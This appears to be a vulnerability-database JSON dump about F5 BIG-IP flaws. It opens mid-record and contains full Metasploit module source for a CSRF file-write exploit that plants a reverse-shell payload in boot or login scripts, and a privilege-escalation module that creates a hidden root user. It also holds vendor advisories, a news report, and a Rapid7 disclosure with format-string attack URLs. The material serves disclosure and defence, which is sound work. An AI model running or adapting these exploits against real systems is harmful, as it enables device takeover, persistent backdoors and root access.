'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}\"\n\n # Build the HTML payload that'll send the SOAP request via the user's browser\n html_payload = %(\n<html>\n <body>\n <form action=\"#{target_url}\" method=\"POST\" enctype=\"text/plain\">\n <textarea id=\"payload\" name=\"<!--\">-->#{Rex::Text.html_encode(csrf_payload)}</textarea>\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n )\n\n # Send the HTML to the browser\n send_response(socket, html_payload, { 'Content-Type' => 'text/html' })\n end\n\n def exploit\n # Sanity check\n if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)\n fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')\n end\n\n print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-11-18T06:07:33", "description": "Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, could lead to the complete compromise of affected systems.\n\nCybersecurity firm Rapid7 said the [flaws](<https://support.f5.com/csp/article/K97843387>) could be abused to gain remote access to the devices and defeat security constraints. 
The issues impact BIG-IP versions 13.x, 14.x, 15.x, 16.x, and 17.x, and BIG-IQ Centralized Management versions 7.x and 8.x.\n\nThe two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -\n\n * **CVE-2022-41622** (CVSS score: 8.8) - A cross-site request forgery ([CSRF](<https://owasp.org/www-community/attacks/csrf>)) vulnerability through iControl SOAP, leading to unauthenticated remote code execution.\n * **CVE-2022-41800** (CVSS score: 8.7) - An iControl REST vulnerability that could allow an authenticated user with an Administrator role to bypass [Appliance mode](<https://support.f5.com/csp/article/K12815>) restrictions.\n\n\"By successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing),\" Rapid7 researcher Ron Bowes [said](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>).\n\nHowever, it's worth noting that such an exploit requires an administrator with an active session to visit a hostile website.\n\nAlso identified were [three different instances](<https://support.f5.com/csp/article/K05403841>) of security bypass, which F5 said cannot be exploited without first breaking existing security barriers through a previously undocumented mechanism.\n\nShould such a scenario arise, an adversary with Advanced Shell ([bash](<https://en.wikipedia.org/wiki/Bash_\\(Unix_shell\\)>)) access to the appliance could weaponize these weaknesses to execute arbitrary system commands, create or delete files, or disable services.\n\nWhile F5 has made no mention of any of the vulnerabilities being exploited in attacks, it's recommended that users apply the necessary \"engineering hotfix\" released by the company to mitigate potential risks.\n", "cvss3": {}, "published": "2022-11-17T06:58:00", "type": "thn", "title": "High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-18T04:16:42", "id": "THN:AE146F0CB0EBDFC82FFBD33FE82302CD", "href": "https://thehackernews.com/2022/11/high-severity-vulnerabilities-reported.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2023-02-03T18:27:17", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-03T00:00:00", "type": "zdt", "title": "F5 Big-IP Create Administrative User Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-02-03T00:00:00", "id": "1337DAY-ID-38183", "href": "https://0day.today/exploit/description/38183", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'unix_crypt'\n\nclass MetasploitModule < Msf::Exploit::Local\n include Msf::Post::Linux::F5Mcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 Big-IP Create Admin User',\n 'Description' => %q{\n This creates a local user with a username/password and root-level\n privileges. 
Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue.\n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways.\n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ron Bowes'],\n 'Platform' => [ 'unix', 'linux', 'python' ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'References' => [\n ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2022-11-16',\n 'Arch' => [ ARCH_CMD, ARCH_PYTHON ],\n 'Type' => :unix_cmd,\n 'Targets' => [[ 'Auto', {} ]],\n 'Notes' => {\n 'Stability' => [],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),\n OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),\n\n OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),\n ])\n end\n\n def exploit\n # Get or generate the username/password\n fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?\n username = datastore['USERNAME']\n\n if datastore['CREATE_SESSION']\n password = Rex::Text.rand_text_alphanumeric(12)\n new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\")\n else\n password = 
datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}\")\n end\n\n # If the password is already hashed, leave it as-is\n vprint_status('Hashing the password with SHA512')\n hashed_password = UnixCrypt::SHA512.build(password)\n\n if !hashed_password || hashed_password.empty?\n fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')\n end\n\n # These requests have to go in a single 'session', which, to us, is\n # a single packet (since we don't have AF_UNIX sockets)\n result = mcp_send_recv([\n # Authenticate as 'admin' (this probably shouldn't work but does)\n mcp_build('user_authenticated', 'structure', [\n mcp_build('user_authenticated_name', 'string', 'admin')\n ]),\n\n # Start transaction\n mcp_build('start_transaction', 'structure', [\n mcp_build('start_transaction_load_type', 'ulong', 0)\n ]),\n\n # Create the role mapping\n mcp_build('create', 'structure', [\n mcp_build('user_role_partition', 'structure', [\n mcp_build('user_role_partition_user', 'string', username),\n mcp_build('user_role_partition_role', 'ulong', 0),\n mcp_build('user_role_partition_partition', 'string', '[All]'),\n ])\n ]),\n\n # Create the userdb entry\n mcp_build('create', 'structure', [\n mcp_build('userdb_entry', 'structure', [\n mcp_build('userdb_entry_name', 'string', username),\n mcp_build('userdb_entry_partition_id', 'string', 'Common'),\n mcp_build('userdb_entry_is_system', 'ulong', 0),\n mcp_build('userdb_entry_shell', 'string', '/bin/bash'),\n mcp_build('userdb_entry_is_crypted', 'ulong', 1),\n mcp_build('userdb_entry_passwd', 'string', hashed_password),\n ])\n ]),\n\n # Finish the transaction\n mcp_build('end_transaction', 'structure', [])\n ])\n\n # Handle errors\n if result.nil?\n fail_with(Failure::Unknown, 'Request to mcp appeared to fail')\n end\n\n # The only result we really care about is an error\n error_returned = false\n result.each do |r|\n result = 
mcp_get_single(r, 'result')\n result_code = mcp_get_single(result, 'result_code')\n\n # If there's no code or it's zero, just ignore it\n if result_code.nil? || result_code == 0\n next\n end\n\n # If we're here, an error was returned!\n error_returned = true\n\n # Otherwise, try and get result_message\n result_message = mcp_get_single(result, 'result_message')\n if result_message.nil?\n print_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\")\n else\n print_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\")\n end\n end\n\n # Let them know if it likely worked\n if !error_returned\n print_good(\"Service didn't return an error, so user was likely created!\")\n\n if datastore['CREATE_SESSION']\n print_status('Attempting create a root session...')\n\n out = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\")\n\n vprint_status(\"Output from su command: #{out}\")\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/38183", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T22:30:11", "description": "This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. 
This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-21T00:00:00", "type": "zdt", "title": "F5 BIG-IP iControl Cross Site Request Forgery Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-21T00:00:00", "id": "1337DAY-ID-38080", "href": "https://0day.today/exploit/description/38080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',\n 'Description' => %q{\n This module exploits a cross-site request forgery (CSRF) vulnerability\n in F5 Big-IP's iControl interface to write an arbitrary file to the\n filesystem.\n\n While any file can be written to any location as root, the\n exploitability is limited by SELinux; the vast majority of writable\n locations are unavailable. By default, we write to a script that\n executes at reboot, which means the payload will execute the next time\n the server boots.\n\n An alternate target - Login - will add a backdoor that executes next\n time a user logs in interactively. 
This overwrites a file,\n but we restore it when we get a session\n\n Note that because this is a CSRF vulnerability, it starts a web\n server, but an authenticated administrator must visit the site, which\n redirects them to the target.\n },\n 'Author' => [\n 'Ron Bowes' # Discovery, PoC, and module\n ],\n 'References' => [\n ['CVE', '2022-41622'],\n ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ['URL', 'https://support.f5.com/csp/article/K94221585'],\n ['URL', 'https://support.f5.com/csp/article/K05403841'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-11-16', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Type' => :unix_cmd,\n 'Privileged' => true,\n 'Targets' => [\n [ 'Restart', {}, ],\n [ 'Login', {}, ],\n [ 'Custom', {}, ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),\n OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),\n OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),\n OptString.new('FILENAME', [false, 'The file on the target to overwrite (for \"custom\" target) - note that SELinux prevents overwriting a great deal of useful files']),\n ]\n )\n end\n\n def on_request_uri(socket, _request)\n if datastore['TARGET'] == 0 # restart\n filename = '/shared/f5_update_action'\n file_payload = <<~EOT\n UpdateAction\n 
https://localhost/success`#{payload.encoded}`\n https://localhost/error\n 0\n 0\n 0\n 0\n EOT\n\n # Delete the logfile if we get a session\n register_file_for_cleanup('/var/log/f5_update_checker.out')\n\n print_status(\"Redirecting the admin to overwrite #(unknown); if successful, your session will come approximately 2 minutes after the target is rebooted\")\n elsif datastore['TARGET'] == 1 # login\n filename = '/var/run/config/timeout.sh'\n file_payload = \"#{payload.encoded} & disown;\"\n\n # Delete the backdoored file if we get a session.. this will be fixed at\n # next reboot\n register_file_for_cleanup('/var/run/config/timeout.sh')\n\n print_status(\"Redirecting the admin to overwrite #(unknown); if successful, your session will come the next time a user logs in interactively\")\n else # Custom\n\n filename = datastore['FILENAME']\n file_payload = payload.encoded\n\n print_status(\"Redirecting the admin to overwrite #(unknown) with the payload\")\n end\n\n # Build the SOAP request that'll be sent to the target server\n csrf_payload = %(\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">#(unknown)</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">#{Rex::Text.encode_base64(file_payload)}</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n</soapenv:Envelope>\n )\n\n # Build the target URL\n target_url = \"#{datastore['TARGET_SSL'] ? 
'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}\"\n\n # Build the HTML payload that'll send the SOAP request via the user's browser\n html_payload = %(\n<html>\n <body>\n <form action=\"#{target_url}\" method=\"POST\" enctype=\"text/plain\">\n <textarea id=\"payload\" name=\"<!--\">-->#{Rex::Text.html_encode(csrf_payload)}</textarea>\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n )\n\n # Send the HTML to the browser\n send_response(socket, html_payload, { 'Content-Type' => 'text/html' })\n end\n\n def exploit\n # Sanity check\n if datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?)\n fail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME')\n end\n\n print_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below')\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/38080", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2022-12-08T22:33:57", "description": "On November 16, 2022, F5 announced the following issues. This document is intended to serve as an overview of these issues to help determine the impact to your F5 devices. 
You can find the details of each issue in the associated articles.\n\nDistributed Cloud and Managed Services\n\nService | Status \n---|--- \nF5 Distributed Cloud Services | Does not affect or has been resolved \nSilverline | Does not affect or has been resolved \nThreat Stack | Does not affect or has been resolved \n \n * [High CVEs](<https://support.f5.com/csp/article/K97843387#high>)\n * [Improvements](<https://support.f5.com/csp/article/K97843387#improvement>)\n\nHigh CVEs\n\nArticle (CVE) | CVSS score | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|---|--- \n[K94221585: iControl SOAP vulnerability CVE-2022-41622](<https://support.f5.com/csp/article/K94221585>) | 8.8 | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.3 \n15.1.0 - 15.1.8 \n14.1.0 - 14.1.5 \n13.1.0 - 13.1.5 | None \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.1.0 | None \n[K13325942: Appliance mode iControl REST vulnerability CVE-2022-41800](<https://support.f5.com/csp/article/K13325942>) | 8.7 - Appliance mode only | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.3 \n15.1.0 - 15.1.8 \n14.1.0 - 14.1.5 \n13.1.0 - 13.1.5 | None \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n\nImprovements\n\nArticle (Improvements) | Affected products | Affected versions1 | Fixes introduced in \n---|---|---|--- \n[K05403841: BIG-IP and BIG-IQ improvements disclosed by Rapid7](<https://support.f5.com/csp/article/K05403841>) | BIG-IP (all modules) | 17.0.0 \n16.1.0 - 16.1.3 \n15.1.0 - 15.1.8 \n14.1.0 - 14.1.5 \n13.1.0 - 13.1.5 | None \nBIG-IQ Centralized Management | 8.0.0 - 8.2.0 \n7.1.0 | None \n \n1F5 evaluates only software versions that have not yet reached the End of Technical Support (EoTS) phase of their lifecycle.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-16T14:28:00", "type": "f5", "title": "Overview of F5 vulnerabilities (November 2022)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-16T14:28:00", "id": "F5:K97843387", "href": "https://support.f5.com/csp/article/K97843387", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T22:31:09", "description": "BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. ([CVE-2022-41622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41622>))\n\nImpact\n\nAn attacker may trick users who have at least resource administrator role privilege and are authenticated through basic authentication in iControl SOAP into performing critical actions. An attacker can exploit this vulnerability only through the control plane, not through the data plane. 
If exploited, the vulnerability can compromise the complete system.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-16T14:19:00", "type": "f5", "title": "iControl SOAP vulnerability CVE-2022-41622", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-12-03T00:05:00", "id": "F5:K94221585", "href": "https://support.f5.com/csp/article/K94221585", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-12T18:45:40", "description": "When running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. ([CVE-2022-41800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41800>))\n\nImpact\n\nIn Appliance mode, an authenticated user with valid user credentials assigned the Administrator role may be able to bypass Appliance mode restrictions. This is a control plane issue; there is no data plane exposure. 
Appliance mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances.\n\nFor more information about Appliance mode, refer to [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>).\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.8}, "published": "2022-11-10T20:46:00", "type": "f5", "title": "Appliance mode iControl REST vulnerability CVE-2022-41800", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2022-11-22T00:07:00", "id": "F5:K13325942", "href": "https://support.f5.com/csp/article/K13325942", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2023-02-09T18:13:06", "description": "\n\nWhile following up our [previous work on F5's BIG-IP devices](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>), Rapid7 found an additional vulnerability in the appliance-mode REST interface; the vulnerability was assigned CVE-2023-22374. We reported it to F5 on December 6, 2022, and are now disclosing it in accordance with our [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>). \nThe specific issue we discovered is an authenticated format string vulnerability ([CWE-134](<https://cwe.mitre.org/data/definitions/134.html>)) in the SOAP interface (`iControlPortal.cgi`), which runs as root and requires an administrative login to access. 
By inserting format string specifiers (such as `%s` or `%n`) into certain GET parameters, an attacker can cause the service to read and write memory addresses that are referenced from the stack. In addition to being an authenticated administrative endpoint, the disclosed memory is written to a log (making it a blind attack). It is difficult to influence the specific addresses read and written, which makes this vulnerability very difficult to exploit (beyond crashing the service) in practice. This has a CVSS score of 7.5 for standard mode deployments and 8.5 in appliance mode.\n\n## Products\n\nThis issue affects BIG-IP only (not BIG-IQ), and as of writing are not yet patched. The currently supported versions known to be vulnerable are:\n\n * F5 BIG-IP 17.0.0\n * F5 BIG-IP 16.1.2.2 - 16.1.3\n * F5 BIG-IP 15.1.5.1 - 15.1.8\n * F5 BIG-IP 14.1.4.6 - 14.1.5\n * F5 BIG-IP 13.1.5\n\n## Discoverer\n\nThis issue was discovered by [Ron Bowes](<https://infosec.exchange/@iagox86>) of Rapid7. It is being disclosed in accordance with Rapid7\u2019s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/#zeroday>).\n\n## Exploitation\n\nThe issue we are disclosing is a blind [format string vulnerability](<https://owasp.org/www-community/attacks/Format_string_attack>), where an authenticated attacker can insert arbitrary format string characters (such as `%d`, `%x`, `%s`, and `%n`) into a query parameter, which are passed into the function `syslog()`, which processes format-string specifiers. This does not require the attacker to actually read the syslog entries\u2014it's the act of parsing the format string that is problematic. That also means that the attacker can't _read_ the memory, unless they have an additional way to read the syslog. By using the `%s` specifier, the service can be trivially crashed with a segmentation fault (because it tries to dereference pointers on the stack as strings). 
Using `%n`, arbitrary data can be written to any pointer found on the stack\u2014depending on what's present on the stack, this may be exploitable for remote code execution.\n\nThe issue occurs in `WSDL=` parameter in the following authenticated administrative URL:\n\n * <https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile>\n\nThe value of the `WSDL=` parameter is written to the syslog:\n \n \n Nov 29 08:32:25 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile\n \n\nIf an attacker adds format-string characters to that argument, they will be processed and values from the stack can be written to the syslog (an attacker wouldn't be able to see this, so it's actually a blind format-string vulnerability). For example, this URL:\n\n * `https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%08x:%08x:%08x:%08x:%08x:%08x:%08x:%08x`\n\nMight write the following, after expanding the `%08x` format specifiers to values from the stack (the colons are just for readability):\n \n \n Nov 29 08:41:47 bigip.example.org soap[4335]: query: WSDL=ASM.LoggingProfile:0000004c:0000004c:08cb31bc:08cba210:08cc4954:01000000:ffeaa378:f5aa8000\n \n\nOnce again, we should note that an attacker cannot see this log, and therefore cannot use this to disclose memory. We can, however, use a `%s` format specifier to tell the service to try and render a string from the stack. If the value on the stack is not a valid memory address (such as the first value, which is `0x0000004c`), the process will crash with a segmentation fault. We can also use the `%n` format specifier to write a (mostly) arbitrary value to a memory address found on the stack.\n\nHere is an example of using the `%s` specifier in a request:\n\n * `https://bigip.example.com/iControl/iControlPortal.cgi?WSDL=ASM.LoggingProfile:%s`\n\nIf we send that to the server (as an authenticated request), the service will crash. 
We can attach a debugger to the server process to validate:\n \n \n [root@bigip:Active:Standalone] config # /tmp/gdb-7.10.1-x64 -q --pid=4335[...](gdb) contContinuing.\n Program received signal SIGSEGV, Segmentation fault.0xf55e3085 in vfprintf () from /lib/libc.so.6(gdb) bt#0 0xf55e3085 in vfprintf () from /lib/libc.so.6#1 0xf568f21f in __vsyslog_chk () from /lib/libc.so.6#2 0xf568f317 in syslog () from /lib/libc.so.6#3 0x0810cc1f in PortalDispatch::HandleWSDLRequest(char*) ()#4 0x08109f08 in iControlPortal::run(int) ()#5 0x0810947f in main ()\n \n\nThe actual vulnerable code in `PortalDispatch::HandleWSDLRequest` in `iControlPortal.cgi` is (in a disassembler):\n \n \n .text:0810CBF2 loc_810CBF2: ; CODE XREF: PortalDispatch::HandleWSDLRequest(char *)+DD\u2191j.text:0810CBF2 pop ecx.text:0810CBF3 pop edi.text:0810CBF4 push esi ; Query string.text:0810CBF5 push eax.text:0810CBF6 call __ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*).text:0810CBFB pop eax.text:0810CBFC pop edx.text:0810CBFD lea eax, [ebp+var_8C8].text:0810CC03 lea edi, [ebp+format].text:0810CC09 push eax.text:0810CC0A push edi.text:0810CC0B call __ZNKSt15basic_stringbufIcSt11char_traitsIcESaIcEE3strEv ; std::basic_stringbuf<char,std::char_traits<char>,std::allocator<char>>::str(void)\n .text:0810CC0B ; } // starts at 810CBE6.text:0810CC10 pop eax.text:0810CC11 push dword ptr [ebp+format].text:0810CC17 push 6.text:0810CC19 ; try {.text:0810CC19 call _syslog ; <--- Vulnerable call to syslog().text:0810CC19 ; } // starts at 810CC19\n \n\nA `String` object (that contains `query:`) has the query string appended to it, then is passed directly into `_syslog()`, which processes format string characters.\n\n## Impact\n\nThe most likely impact of a successful attack is to crash the server process. 
A skilled attacker could potentially develop a remote code execution exploit, which would run code on the F5 BIG-IP device as the root user.\n\n## Remediation\n\nThere is currently no fix for this issue in released BIG-IP software versions. F5 has indicated that an engineering hotfix will be made available. It should be stressed that this issue is only exploitable as an authenticated user of the vulnerable device. So, end users should restrict access to the management port to only trusted individuals (and the linked KB provides a procedure to bind `webd` to localhost) which is usually good advice anyway.\n\n## Rapid7 customers\n\nAn authenticated vulnerability check for CVE-2023-22374 will be available in today's (Feb 1) content-only release. Because F5's [hotfix policy](<https://support.f5.com/csp/article/K4918>) is that hotfixes come with "no warranty of guarantee of usability," please note that hotfixes are not taken into consideration for vulnerability checks within InsightVM.\n\n## Timeline\n\n * December, 2022 - Discovered the vulnerability\n * Tue, Dec 6, 2022 - Reported to F5 SIRT\n * Wed, Dec 7, 2022 - F5 forwarded to the F5 Product Engineering team for analysis\n * Thu, Dec 22, 2022 - F5 confirmed the issue and has started working on a fix\n * Wed, Jan 4, 2023 - Issue reported to CERT/CC (VRF#23-01-TVJZN)\n * Wed, Jan 18, 2023 - F5 provided a draft security advisory, CVSS scoring, and CVE-2023-22374 reservation\n * Wed, Feb 1, 2023 - This public disclosure and [F5's advisory](<https://my.f5.com/manage/s/article/K000130415>) published", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, 
